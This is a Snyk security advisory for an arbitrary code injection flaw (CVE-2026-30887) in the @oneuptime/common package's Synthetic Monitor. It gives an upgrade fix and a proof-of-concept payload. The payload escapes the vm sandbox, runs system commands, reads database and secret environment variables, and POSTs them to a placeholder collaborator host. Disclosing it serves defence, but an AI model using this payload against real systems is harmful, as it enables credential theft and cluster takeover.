Homepage

Arbitrary Code Injection Affecting @oneuptime/common package, versions <10.0.18

Severity

 Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Code Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-ONEUPTIMECOMMON-15440733
  • published9 Mar 2026
  • disclosed7 Mar 2026
  • credithunterxsirago1
Report a new vulnerability Found a mistake?

Introduced: 7 Mar 2026

NewCVE-2026-30887  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

Upgrade @oneuptime/common to version 10.0.18 or higher.

Overview

@oneuptime/common is a The OneUptime Common UI Library is a collection of shared components, utilities that are used across the OneUptime platform. It is designed to be easy to install and use, and to be extensible. This library is built with React and TypeScript. It includes c

Affected versions of this package are vulnerable to Arbitrary Code Injection via the vm.runInContext function. An attacker can execute arbitrary system commands and exfiltrate sensitive environment variables by submitting crafted JavaScript payloads through the Synthetic Monitor feature.

Note: In the context of oneuptime, the code is executed on the oneuptime-probe container, which holds database/cluster credentials in its environment variables. This directly leads to a complete compromise of the cluster.

PoC

return new Promise((resolve) => {
    try {
        // 1. Traverse the prototype chain to grab the host's process object
        const proc = this.constructor.constructor('return process')();
        
        // 2. Load the host's child_process module & run a system command
        const cp = proc.mainModule.require('child_process');
        const output = cp.execSync('ls -la /usr/src/app').toString();
        
        // 3. (Optional) Read sensitive environment secrets
        const secret = proc.env.ONEUPTIME_SECRET;
        const db_pass = proc.env.DATABASE_PASSWORD;
        
        // 4. Exfiltrate the data via the native `http` module
        const http_real = proc.mainModule.require('http');
        const req = http_real.request({ 
            hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE', 
            port: 80, 
            path: '/', 
            method: 'POST' 
        }, (res) => {
            resolve("EXFILTRATION_STATUS: " + res.statusCode);
        });
        
        req.on('error', (e) => resolve("EXFILTRATION_ERROR: " + e.message));
        
        const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });
        req.write(payloadData);
        req.end();
    } catch(e) {
        resolve("CRITICAL_ERROR: " + e.message);
    }
});

References

CVSS Base Scores

version 4.0
version 3.1